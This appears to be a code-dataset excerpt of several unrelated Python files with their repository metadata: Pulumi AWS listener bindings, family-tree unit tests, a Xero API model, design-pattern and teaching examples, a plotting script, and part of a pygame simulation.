def alpn_policy(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "alpn_policy", value)
@property
@pulumi.getter
def certificates(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ListenerCertificateArgs']]]]:
return pulumi.get(self, "certificates")
@certificates.setter
def certificates(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ListenerCertificateArgs']]]]):
pulumi.set(self, "certificates", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="sslPolicy")
def ssl_policy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ssl_policy")
@ssl_policy.setter
def ssl_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_policy", value)
class Listener(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alpn_policy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
default_actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerActionArgs']]]]] = None,
load_balancer_arn: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
ssl_policy: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Resource Type definition for AWS::ElasticLoadBalancingV2::Listener
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ListenerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Resource Type definition for AWS::ElasticLoadBalancingV2::Listener
:param str resource_name: The name of the resource.
:param ListenerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ListenerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alpn_policy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
default_actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerActionArgs']]]]] = None,
load_balancer_arn: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
ssl_policy: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ListenerArgs.__new__(ListenerArgs)
__props__.__dict__["alpn_policy"] = alpn_policy
__props__.__dict__["certificates"] = certificates
if default_actions is None and not opts.urn:
raise TypeError("Missing required property 'default_actions'")
__props__.__dict__["default_actions"] = default_actions
if load_balancer_arn is None and not opts.urn:
raise TypeError("Missing required property 'load_balancer_arn'")
__props__.__dict__["load_balancer_arn"] = load_balancer_arn
__props__.__dict__["port"] = port
__props__.__dict__["protocol"] = protocol
__props__.__dict__["ssl_policy"] = ssl_policy
__props__.__dict__["listener_arn"] = None
super(Listener, __self__).__init__(
'aws-native:elasticloadbalancingv2:Listener',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Listener':
"""
Get an existing Listener resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ListenerArgs.__new__(ListenerArgs)
__props__.__dict__["alpn_policy"] = None
__props__.__dict__["certificates"] = None
__props__.__dict__["default_actions"] = None
__props__.__dict__["listener_arn"] = None
__props__.__dict__["load_balancer_arn"] = None
__props__.__dict__["port"] = None
__props__.__dict__["protocol"] = None
__props__.__dict__["ssl_policy"] = None
return Listener(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="alpnPolicy")
def alpn_policy(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "alpn_policy")
@property
@pulumi.getter
def certificates(self) -> pulumi.Output[Optional[Sequence['outputs.ListenerCertificate']]]:
return pulumi.get(self, "certificates")
@property
@pulumi.getter(name="defaultActions")
def default_actions(self) -> pulumi.Output[Sequence['outputs.ListenerAction']]:
return pulumi.get(self, "default_actions")
@property
@pulumi.getter(name="listenerArn")
def listener_arn(self) -> pulumi.Output[str]:
return pulumi.get(self, "listener_arn")
@property
@pulumi.getter(name="loadBalancerArn")
def load_balancer_arn(self) -> pulumi.Output[str]:
return pulumi.get(self, "load_balancer_arn")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="sslPolicy")
def ssl_policy(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ssl_policy")
| 42.003984 | 134 | 0.650858 | 1,154 | 10,543 | 5.619584 | 0.123917 | 0.0899 | 0.084965 | 0.057826 | 0.661372 | 0.573015 | 0.467849 | 0.402621 | 0.341557 | 0.259676 | 0 | 0.000497 | 0.236271 | 10,543 | 250 | 135 | 42.172 | 0.804893 | 0.095608 | 0 | 0.405263 | 1 | 0 | 0.125334 | 0.021992 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147368 | false | 0.005263 | 0.036842 | 0.078947 | 0.278947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cad74d49e4e9a08a93a53a5673e980c74cb3858 | 3,074 | py | Python | tests/test_individual.py | viswanathareddya/Geektrust_in_family | 197d4d0eadf191e1ef9d7d21d6d81d62645169c2 | [
"MIT"
] | null | null | null | tests/test_individual.py | viswanathareddya/Geektrust_in_family | 197d4d0eadf191e1ef9d7d21d6d81d62645169c2 | [
"MIT"
] | null | null | null | tests/test_individual.py | viswanathareddya/Geektrust_in_family | 197d4d0eadf191e1ef9d7d21d6d81d62645169c2 | [
"MIT"
] | null | null | null | import unittest
from Familytree.individual import Person
from Familytree import variables
class Testperson(unittest.TestCase):
def setUp(self):
self.person = Person(1, "Jane", "Female")
def test_initialization(self):
# check instance
self.assertEqual(isinstance(self.person, Person), True)
# check properties
self.assertEqual(self.person.id, 1)
self.assertEqual(self.person.name, "Jane")
self.assertEqual(self.person.gender, "Female")
self.assertEqual(self.person.mother, None)
self.assertEqual(self.person.father, None)
self.assertEqual(self.person.spouse, None)
self.assertEqual(self.person.children, [])
def test_assign_mother(self):
mother_error_case = "error_value"
mother_error_male_case = Person(2, "male_person", "Male")
mother_success_case = Person(3, "Mother", "Female")
# error case
self.assertRaises(ValueError, self.person.assign_mother, mother_error_case)
self.assertRaises(ValueError, self.person.assign_mother, mother_error_male_case)
# success case
self.person.assign_mother(mother_success_case)
self.assertEqual(self.person.mother.name, "Mother")
        self.assertEqual(self.person.mother.gender, "Female")
def test_assign_father(self):
father_error_case = "error_value"
father_error_female_case = Person(2, "female_father", "Female")
father_success_case = Person(3, "Father", "Male")
# error cases
self.assertRaises(ValueError, self.person.assign_father, father_error_case)
self.assertRaises(ValueError, self.person.assign_father, father_error_female_case)
# success case
self.person.assign_father(father_success_case)
self.assertEqual(self.person.father.name, "Father")
        self.assertEqual(self.person.father.gender, "Male")
def test_assign_spouse(self):
spouse_error_case = "error_value"
spouse_error_same_gender = Person(2, "same_gender_spouse", "Female")
spouse_success_case = Person(3, "Husband", "Male")
# error cases
self.assertRaises(ValueError, self.person.assign_spouse, spouse_error_case)
self.assertRaises(ValueError, self.person.assign_spouse, spouse_error_same_gender)
# success case
self.person.assign_spouse(spouse_success_case)
self.assertEqual(self.person.spouse.name, "Husband")
self.assertEqual(self.person.spouse.gender, "Male")
def test_add_children(self):
child_error_case = "error_Case"
child_success_case = Person(4, "Daughter", "Female")
# error case
self.assertRaises(ValueError, self.person.add_children, child_error_case)
# success case
self.person.add_children(child_success_case)
self.assertEqual(len(self.person.children), 1)
self.assertEqual(self.person.children[0].name, "Daughter")
self.assertEqual(self.person.children[0].gender, "Female")
if __name__ == '__main__':
unittest.main()
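# Run from the project root with the standard test runner, e.g.:
#     python -m unittest tests.test_individual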
| 37.487805 | 90 | 0.691282 | 363 | 3,074 | 5.61708 | 0.14876 | 0.142227 | 0.121138 | 0.159392 | 0.50613 | 0.342325 | 0.225601 | 0.225601 | 0.193722 | 0.064247 | 0 | 0.004886 | 0.201041 | 3,074 | 81 | 91 | 37.950617 | 0.825326 | 0.041965 | 0 | 0 | 0 | 0 | 0.076005 | 0 | 0 | 0 | 0 | 0 | 0.461538 | 1 | 0.115385 | false | 0 | 0.057692 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cae071fb0b7de70166dc34fefb63b3a8b59aa07 | 795 | py | Python | examples/first_class_functions.py | HansVdb/pythonavd-d01 | 8434a7e211709f59994280501f0361951db5a05c | [
"BSD-2-Clause"
] | null | null | null | examples/first_class_functions.py | HansVdb/pythonavd-d01 | 8434a7e211709f59994280501f0361951db5a05c | [
"BSD-2-Clause"
] | null | null | null | examples/first_class_functions.py | HansVdb/pythonavd-d01 | 8434a7e211709f59994280501f0361951db5a05c | [
"BSD-2-Clause"
] | null | null | null | def foo():
print("I'm a lovely foo()-function")
print(foo)
# <function foo at 0x7f9b75de3f28>
print(foo.__class__)
# <class 'function'>
bar = foo
bar()
# I'm a lovely foo()-function
print(bar.__name__)
# foo
def do_something(what):
"""Executes a function
:param what: name of the function to be executed
"""
what()
do_something(foo)
# I'm a lovely foo()-function
def try_me(self):
print('I am '+self.name)
print("I was created by " + self.creator)
print("This is wat I do")
self()
# a function is an object with attributes and methods
setattr(foo, 'name', 'foo')
foo.creator = "Hans"
foo.print = try_me
foo.print(foo)
"""
I am foo
I was created by Hans
This is what I do
I'm a lovely foo()-function
"""
print(foo)
# <function foo at 0x7f9b75de3f28>
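# Because functions are first-class values they can also live in data
# structures. A small extra sketch (not part of the original examples above):
# a dispatch table mapping names to callables.
def greet():
    print("hello from greet()")

dispatch = {'foo': foo, 'greet': greet}
dispatch['greet']()
# hello from greet()
dispatch['foo']()
# I'm a lovely foo()-function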
| 16.5625 | 53 | 0.660377 | 130 | 795 | 3.946154 | 0.323077 | 0.128655 | 0.023392 | 0.070175 | 0.348928 | 0.302144 | 0.263158 | 0.214425 | 0.214425 | 0.214425 | 0 | 0.025197 | 0.201258 | 795 | 47 | 54 | 16.914894 | 0.782677 | 0.335849 | 0 | 0.1 | 0 | 0 | 0.180095 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0 | 0 | 0.15 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
6cb32f44a52f1c0281429f935c70345217dd11a0 | 5,105 | py | Python | xero_python/appstore/models/plan.py | gavinwhyte/xero-python | 53a028c3b7c51da1db203b616bf7b7a028a4a1d2 | [
"MIT"
] | null | null | null | xero_python/appstore/models/plan.py | gavinwhyte/xero-python | 53a028c3b7c51da1db203b616bf7b7a028a4a1d2 | [
"MIT"
] | null | null | null | xero_python/appstore/models/plan.py | gavinwhyte/xero-python | 53a028c3b7c51da1db203b616bf7b7a028a4a1d2 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Xero AppStore API
These endpoints are for Xero Partners to interact with the App Store Billing platform # noqa: E501
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class Plan(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"id": "str",
"name": "str",
"status": "str",
"subscription_items": "list[SubscriptionItem]",
}
attribute_map = {
"id": "id",
"name": "name",
"status": "status",
"subscription_items": "subscriptionItems",
}
def __init__(
self, id=None, name=None, status=None, subscription_items=None
): # noqa: E501
"""Plan - a model defined in OpenAPI""" # noqa: E501
self._id = None
self._name = None
self._status = None
self._subscription_items = None
self.discriminator = None
self.id = id
self.name = name
self.status = status
self.subscription_items = subscription_items
@property
def id(self):
"""Gets the id of this Plan. # noqa: E501
The unique identifier of the plan # noqa: E501
:return: The id of this Plan. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Plan.
The unique identifier of the plan # noqa: E501
:param id: The id of this Plan. # noqa: E501
:type: str
"""
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def name(self):
"""Gets the name of this Plan. # noqa: E501
The name of the plan. It is used in the invoice line item description. # noqa: E501
:return: The name of this Plan. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Plan.
The name of the plan. It is used in the invoice line item description. # noqa: E501
:param name: The name of this Plan. # noqa: E501
:type: str
"""
if name is None:
raise ValueError(
"Invalid value for `name`, must not be `None`"
) # noqa: E501
self._name = name
@property
def status(self):
"""Gets the status of this Plan. # noqa: E501
Status of the plan. Available statuses are ACTIVE, CANCELED, and PENDING_ACTIVATION. # noqa: E501
:return: The status of this Plan. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Plan.
Status of the plan. Available statuses are ACTIVE, CANCELED, and PENDING_ACTIVATION. # noqa: E501
:param status: The status of this Plan. # noqa: E501
:type: str
"""
if status is None:
raise ValueError(
"Invalid value for `status`, must not be `None`"
) # noqa: E501
allowed_values = [
"ACTIVE",
"CANCELED",
"PENDING_ACTIVATION",
"None",
] # noqa: E501
if status:
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}".format( # noqa: E501
status, allowed_values
)
)
self._status = status
@property
def subscription_items(self):
"""Gets the subscription_items of this Plan. # noqa: E501
List of the subscription items belonging to the plan. It does not include cancelled subscription items. # noqa: E501
:return: The subscription_items of this Plan. # noqa: E501
:rtype: list[SubscriptionItem]
"""
return self._subscription_items
@subscription_items.setter
def subscription_items(self, subscription_items):
"""Sets the subscription_items of this Plan.
List of the subscription items belonging to the plan. It does not include cancelled subscription items. # noqa: E501
:param subscription_items: The subscription_items of this Plan. # noqa: E501
:type: list[SubscriptionItem]
"""
if subscription_items is None:
raise ValueError(
"Invalid value for `subscription_items`, must not be `None`"
) # noqa: E501
self._subscription_items = subscription_items
| 28.20442 | 126 | 0.56905 | 602 | 5,105 | 4.747508 | 0.189369 | 0.081176 | 0.055983 | 0.058782 | 0.531141 | 0.474808 | 0.439118 | 0.321554 | 0.228132 | 0.190343 | 0 | 0.027753 | 0.343585 | 5,105 | 180 | 127 | 28.361111 | 0.825127 | 0.400784 | 0 | 0.102564 | 1 | 0 | 0.163517 | 0.017666 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.025641 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cb33395406f43fe2ee837077f069c801b9bcf8e | 2,167 | py | Python | design_patterns/behavioral/command.py | Minkov/python-oop-2021-02 | bd387dde165f4338eed66c4bc0b4b516ee085340 | [
"MIT"
] | 2 | 2021-02-22T22:55:31.000Z | 2021-04-05T18:25:10.000Z | design_patterns/behavioral/command.py | Minkov/python-oop-2021-02 | bd387dde165f4338eed66c4bc0b4b516ee085340 | [
"MIT"
] | null | null | null | design_patterns/behavioral/command.py | Minkov/python-oop-2021-02 | bd387dde165f4338eed66c4bc0b4b516ee085340 | [
"MIT"
] | 2 | 2021-04-05T18:35:11.000Z | 2021-04-08T12:18:19.000Z | from abc import ABC, abstractmethod
class Command(ABC):
@abstractmethod
def execute(self):
pass
@abstractmethod
def un_execute(self):
pass
class AddCommand(Command):
def __init__(self, values, new_value):
self.values = values
self.new_value = new_value
def execute(self):
self.values.append(self.new_value)
def un_execute(self):
self.values.pop()
class SumCommand(Command):
def __init__(self, values):
self.values = values
def execute(self):
return sum(self.values)
def un_execute(self):
return sum(self.values)
class RemoveLastCommand(Command):
def __init__(self, values):
self.values = values
self.removed_value = None
def execute(self):
self.removed_value = self.values.pop()
def un_execute(self):
self.values.append(self.removed_value)
self.removed_value = None
class RemoveFirstCommand(Command):
def __init__(self, values):
self.values = values
self.removed_value = None
def execute(self):
self.removed_value = self.values.pop(0)
def un_execute(self):
self.values.insert(0, self.removed_value)
self.removed_value = None
class CommandsMemento:
def __init__(self, values):
self.state = list(values)
commands = []
values = []
while True:
command_text = input()
if command_text == 'END':
break
if command_text == 'REMOVE_LAST':
command = RemoveLastCommand(values)
elif command_text == 'REMOVE_FIRST':
command = RemoveFirstCommand(values)
elif command_text == 'SUM':
command = SumCommand(values)
else:
_, value = command_text.split(' ')
command = AddCommand(values, int(value))
commands.append(command)
mementos = []
for command in commands:
    print(command.execute())
    mementos.append(CommandsMemento(values))  # snapshot state for the memento loop below
for memento in mementos:
print(memento.state)
print('----')
print(values)
for command in commands[::-1]:
print(command.un_execute())
print(values)
"""
ADD 5
ADD 6
SUM
REMOVE_FIRST
ADD 3
ADD 7
SUM
REMOVE_LAST
SUM
REMOVE_LAST
SUM
REMOVE_LAST
SUM
END
"""
| 18.210084 | 49 | 0.646054 | 262 | 2,167 | 5.148855 | 0.21374 | 0.126019 | 0.094885 | 0.059303 | 0.437361 | 0.404003 | 0.274277 | 0.243143 | 0.152706 | 0.152706 | 0 | 0.0043 | 0.248731 | 2,167 | 118 | 50 | 18.364407 | 0.824324 | 0 | 0 | 0.428571 | 0 | 0 | 0.016481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0.028571 | 0.014286 | 0.028571 | 0.342857 | 0.085714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cb4cc84649164fc13d24146a17efcfc7d6676a4 | 2,120 | py | Python | Ensemble_Movie.py | nchaparr/Sam_Output_Anls | c6736f7863b36d09738ac95b7cbde19ba69526cf | [
"MIT"
] | null | null | null | Ensemble_Movie.py | nchaparr/Sam_Output_Anls | c6736f7863b36d09738ac95b7cbde19ba69526cf | [
"MIT"
] | 1 | 2015-04-18T14:47:49.000Z | 2015-05-01T21:51:44.000Z | Ensemble_Movie.py | nchaparr/Sam_Output_Anls | c6736f7863b36d09738ac95b7cbde19ba69526cf | [
"MIT"
] | null | null | null | from netCDF4 import Dataset
import glob,os.path
import numpy as np
from scipy.interpolate import UnivariateSpline
from matplotlib import cm
import matplotlib.pyplot as plt
#import site
#site.addsitedir('/tera/phil/nchaparr/SAM2/sam_main/python')
#from Percentiles import *
from matplotlib.patches import Patch
import sys
sys.path.insert(0, '/tera/phil/nchaparr/python')
#import nchap_fun as nc
import matplotlib.animation as animation
from Ens_Profs import Get_Var_Arrays
from Make_Timelist import *
"""
Profiles/2d ims at a point
for a movie
may be pointless now -- data at longer delta ts
"""
#set up plot
dump_time_list, Times_hrs = Make_Timelists(1, 60, 28800)
dump_time = dump_time_list[59]
i=1
ims = []
ims1 = []
theFig = plt.figure()
#theFig1.clf()
#theAx = theFig.add_subplot(111)
#theAx1 = theFig.add_subplot(111)
#theAx.set_title('')
#theAx.set_xlabel('')
#theAx.set_ylabel('')
for dump_time in dump_time_list:
#getting horizontally averaged, ensemble averaged tracer
[tracer, theta, height] = Get_Var_Arrays(dump_time)
#[grad_tracer, tracer_peaks] = nc.Domain_Grad(tracer, height)
[yindex, xindex] = [13, 44]
#print yindex, xindex, tracer_peaks[yindex, xindex]
i=i+1
x = np.arange(0, 1600, 25)
y = height[0:64]
X,Y = np.meshgrid(x, y)
tslice = tracer[0:64, 13, :]
thetaslice = theta[0:64, 13, :]
ims.append((plt.pcolor(X, Y, tslice, norm=plt.Normalize(0, 30)),))
#ims.append((plt.pcolor(X, Y, thetaslice, norm=plt.Normalize(0, 30)),))
#ims.append(plt.plot(tracer[:, yindex, xindex], height, 'ko'))
#ims.append(plt.plot(theta[:, yindex, xindex], height, 'ko'))
#plt.savefig('/tera/phil/nchaparr/python/Plotting/July92013/pngs/for_point_movie/Point_Tracer_'+ str(i)+'.png', bbox_inches=0)
im_ani = animation.ArtistAnimation(theFig, ims, interval=500, repeat_delay=30000, blit=True)
#im_ani = animation.ArtistAnimation(theFig, ims, interval=1000, repeat_delay=30000, blit=True)
#im_ani.save('/tera/phil/nchaparr/python/Plotting/July92013/pngs/for_point_movie/im.mp4')
plt.show()
| 28.266667 | 130 | 0.706132 | 316 | 2,120 | 4.610759 | 0.439873 | 0.032944 | 0.043926 | 0.045299 | 0.238161 | 0.238161 | 0.218943 | 0.119423 | 0.07687 | 0.07687 | 0 | 0.046927 | 0.15566 | 2,120 | 74 | 131 | 28.648649 | 0.767039 | 0.438208 | 0 | 0 | 0 | 0 | 0.024436 | 0.024436 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.366667 | 0 | 0.366667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6cbf415d6c7f56e53145504a706d0df172e83094 | 14,720 | py | Python | clique_main_1.py | mccrimmonmd/clique | d6539a4530acf5c5cf85dac2eb520fa69f3a310a | [
"MIT"
] | null | null | null | clique_main_1.py | mccrimmonmd/clique | d6539a4530acf5c5cf85dac2eb520fa69f3a310a | [
"MIT"
] | null | null | null | clique_main_1.py | mccrimmonmd/clique | d6539a4530acf5c5cf85dac2eb520fa69f3a310a | [
"MIT"
] | null | null | null | """
Version 1:
- It begins
- For some reason, this version of the decision code (in Shape.move) just makes
every shape move up and to the left
"""
from __future__ import division
import pygame, pygame.locals, math, random
RAND = random.Random()
RAND.seed()
UP = 0
DOWN = 1
RIGHT = 2
LEFT = 3
STAY = 4
PLAYER_MOVEMENT = 2
OFFSET = [0, 0]
SHAPE_TYPES = ['triangle', 'square', 'pentagon', 'hexagon', 'circle']
SHAPE_SIDES = {
'circle': 1, 'hexagon': 6, 'pentagon': 5, 'square': 4, 'triangle': 3}
SHAPE_MEAN = {
'circle': 35, 'hexagon': 40, 'pentagon': 45, 'square': 70, 'triangle': 80}
SHAPE_DEV = {
'circle': 5, 'hexagon': 6, 'pentagon': 7, 'square': 9, 'triangle': 10}
MAGIC_CONSTANT = 2 / len(SHAPE_TYPES)
# if the dividend is 1, all shape types will be generated equally
# if the dividend is > 1, the distribution of shapes will be skewed in favor
# of fewer sides.
# if the dividend is >= the divisor, only triangles will be generated.
LINE_OF_SIGHT = 500
STROKE_WIDTH = 1
NUM_SHAPES = 50
MAX_AGE = 10000
BLACK = pygame.color.Color(0,0,0)
WHITE = pygame.color.Color(255,255,255)
def main(player, shapes, size, period):
pygame.init()
pygame.key.set_repeat(25, 25)
screen = pygame.display.set_mode(size)
TICK = pygame.locals.USEREVENT + 1
pygame.time.set_timer(TICK, period)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.quit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP:
player.move_player(UP)
elif event.key == pygame.K_DOWN:
player.move_player(DOWN)
elif event.key == pygame.K_RIGHT:
player.move_player(RIGHT)
elif event.key == pygame.K_LEFT:
player.move_player(LEFT)
#elif event.key == pygame.K_SPACE:
#pass
elif event.type == TICK:
screen.fill(WHITE)
# these loops must run consecutively because shapes calculate
# new positions based on the old positions of other shapes;
# discrete timesteps are maintained with the Shape.pos and
# Shape.nextpos variables. A shape's actual position is only
# updated in its draw method.
for shape in shapes:
if shape != player: shape.move()
for shape in shapes:
if shape != player: shape.draw(screen)
# the player should always be on top, so it gets rendered last
player.draw(screen)
pygame.display.flip()
# end main()
class Shape(object):
def __init__(self, position, shape_type, side_length, color, persona, age=0):
self.pos = position
self.nextpos = list(position)
self.direction = STAY
self.shape_type = shape_type
self.side_length = side_length # for circles, side_length = radius
self.color = color
self.persona = persona
self.age = age
self.points = makepoints(self.pos, self.shape_type, self.side_length)
def move(self):
# KEEP TRACK OF CURRENT DIRECTION; VOTE TO CHANGE IT OR NOT
# (shapes should have a certain amount of inertia)
# the shape should lose its inertia if its personal space is invaded #
if RAND.random() < .25: # shape is changing direction
# 0 for UP, 1 for DOWN, 2 for RIGHT, 3 for LEFT, 4 for STAY
votes = [0,0,0,0,0]
self_type = self.shape_type
self_r = self.color.r
self_g = self.color.g
self_b = self.color.b
self_size = self.side_length
rgb_tolerance = self.persona.rgb_tolerance
#size_tolerance = self.persona.size_tolerance
space_tolerance = self.persona.personal_space
xpos = self.pos[0]
ypos = self.pos[1]
ups = 0
downs = 0
rights = 0
lefts = 0
stays = 0
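            # note: this loop runs over the global 'shapes' list, which includes
            # self (distance 0), so every shape also casts avoid votes against
            # its own current position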
for shape in shapes:
xdist = xpos - shape.pos[0]
ydist = ypos - shape.pos[1]
totaldist = math.sqrt(xdist**2 + ydist**2)
if totaldist < LINE_OF_SIGHT:
approach = closer(xdist, ydist)
avoid = further(xdist, ydist)
if approach == 0 or avoid == 0: ups += 1
if approach == 1 or avoid == 1: downs += 1
if approach == 2 or avoid == 2: rights += 1
if approach == 3 or avoid == 3: lefts += 1
if approach == 4 or avoid == 4: stays += 1
assert approach != avoid
#print approach, avoid
if totaldist < space_tolerance:
votes[avoid] += space_tolerance - int(totaldist)
if self_type != shape.shape_type:
#votes[approach] += 3
#votes[STAY] += 1
#else:
votes[avoid] += 3
if (self_r - rgb_tolerance <=
shape.color.r <=
self_r + rgb_tolerance):
votes[approach] += 1
#else:
#votes[avoid] += 1
if (self_g - rgb_tolerance <=
shape.color.g <=
self_g + rgb_tolerance):
votes[approach] += 1
#else:
#votes[avoid] += 1
if (self_b - rgb_tolerance <=
shape.color.b <=
self_b + rgb_tolerance):
votes[approach] += 1
#else:
#votes[avoid] += 1
#if (self_size - size_tolerance <=
#shape.side_length <=
#self_size + size_tolerance):
#votes[approach] += 1
#else:
#votes[avoid] += 1
direction = bestvote(votes)
print votes, ups, downs, rights, lefts, stays
else: # shape is not changing direction
direction = self.direction
if direction == UP: self.nextpos[1] -= 1
elif direction == DOWN: self.nextpos[1] += 1
elif direction == RIGHT: self.nextpos[0] += 1
elif direction == LEFT: self.nextpos[0] -= 1
# if direction == STAY: do nothing
self.direction = direction
def move_player(self, direction):
# modify offset in *opposite* direction
# (to keep "camera" centered on player)
if direction == UP:
OFFSET[1] += PLAYER_MOVEMENT
elif direction == DOWN:
OFFSET[1] -= PLAYER_MOVEMENT
elif direction == RIGHT:
OFFSET[0] -= PLAYER_MOVEMENT
elif direction == LEFT:
OFFSET[0] += PLAYER_MOVEMENT
def draw(self, surface):
if self == player:
pygame.draw.circle(surface, self.color, self.pos, self.side_length)
pygame.draw.circle(surface, BLACK, self.pos,
self.side_length, STROKE_WIDTH)
else:
xpos = self.pos[0] + OFFSET[0]
ypos = self.pos[1] + OFFSET[1]
# if the shape isn't visible, don't bother drawing it
offscreen = (xpos > size[0] + self.side_length or
xpos < -self.side_length or
ypos > size[1] + self.side_length or
ypos < -self.side_length)
if not offscreen:
if self.shape_type == 'circle':
pygame.draw.circle(surface, self.color, (xpos, ypos),
self.side_length)
pygame.draw.circle(surface, BLACK, (xpos, ypos),
